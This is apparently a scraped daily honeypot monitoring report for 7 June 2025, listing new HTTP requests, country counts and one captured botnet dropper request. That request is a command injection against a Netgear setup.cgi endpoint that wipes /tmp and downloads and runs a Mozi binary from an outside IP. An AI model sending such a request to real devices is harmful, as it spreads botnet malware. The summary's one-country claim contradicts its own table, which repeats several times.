Table of Contents

Daily Report: 2025-06-07
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 7 new requests that have never been observed before (these were added to the monitored request database.).

A total of 806 requests were recorded during the day, originating from 1 different countries, with a peak of 222 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Dubai

botnet_dropper_behaviour
#

remote_addr	request
45.230.66.57	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.57:11823/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
61	2	GET /rules HTTP/1.1
63	2	GET /rules HTTP/1.0
67	2	GET /get_params.cgi HTTP/1.1
218	1	GET /tisv2/a/de/ HTTP/1.1
273	1	\x04\x01\x00P\xD0_p\x01\x00
309	1	\x00\x0E8\x93\xA8\xB9&ZiX\xB7\x00\x00\x00\x00\x00
310	1	\x00\x0E\x08\x93\xA8\xB9&ZiX\xB7\x00\x00\x00\x00\x00

country_iso_code
#

	number_of_occurence	country_iso_code
0	222	US
1	97	JP
2	92	BG
3	55	NL
4	54	GB
5	54	VN
6	43	DE
7	33	CA
8	25	IN
9	23	FR
10	20	NG
11	10	CN
12	9	PL
13	8	HK
14	6	ZA
15	6	SC
16	5	AO
17	5	GH
18	4	KR
19	4	BE
20	3	PT
21	3	AR
22	2	ES
23	2	RU
24	2	IT
25	2	UA
26	2	KZ
27	2	IE
28	2	SG
29	2	BR
30	1	ID
31	1	SE
32	1	MC
33	1	RO
34	1	GR
35	1	IL
36	1	PA
37	1	LT
38	1	IR

Report: 2025-06-06

6 June 2025·408 words

Repport Daily

Report: 2025-06-05

5 June 2025·513 words

Repport Daily

Report: 2025-06-04

4 June 2025·486 words

Repport Daily

	number_of_occurence	country_iso_code
0	222	US
1	97	JP
2	92	BG
3	55	NL
4	54	GB
5	54	VN
6	43	DE
7	33	CA
8	25	IN
9	23	FR
10	20	NG
11	10	CN
12	9	PL
13	8	HK
14	6	ZA
15	6	SC
16	5	AO
17	5	GH
18	4	KR
19	4	BE
20	3	PT
21	3	AR
22	2	ES
23	2	RU
24	2	IT
25	2	UA
26	2	KZ
27	2	IE
28	2	SG
29	2	BR
30	1	ID
31	1	SE
32	1	MC
33	1	RO
34	1	GR
35	1	IL
36	1	PA
37	1	LT
38	1	IR

	number_of_occurence	country_iso_code
0	222	US
1	97	JP
2	92	BG
3	55	NL
4	54	GB
5	54	VN
6	43	DE
7	33	CA
8	25	IN
9	23	FR
10	20	NG
11	10	CN
12	9	PL
13	8	HK
14	6	ZA
15	6	SC
16	5	AO
17	5	GH
18	4	KR
19	4	BE
20	3	PT
21	3	AR
22	2	ES
23	2	RU
24	2	IT
25	2	UA
26	2	KZ
27	2	IE
28	2	SG
29	2	BR
30	1	ID
31	1	SE
32	1	MC
33	1	RO
34	1	GR
35	1	IL
36	1	PA
37	1	LT
38	1	IR

Daily Report: 2025-06-07#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-06-07
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	222	US
1	97	JP
2	92	BG
3	55	NL
4	54	GB
5	54	VN
6	43	DE
7	33	CA
8	25	IN
9	23	FR
10	20	NG
11	10	CN
12	9	PL
13	8	HK
14	6	ZA
15	6	SC
16	5	AO
17	5	GH
18	4	KR
19	4	BE
20	3	PT
21	3	AR
22	2	ES
23	2	RU
24	2	IT
25	2	UA
26	2	KZ
27	2	IE
28	2	SG
29	2	BR
30	1	ID
31	1	SE
32	1	MC
33	1	RO
34	1	GR
35	1	IL
36	1	PA
37	1	LT
38	1	IR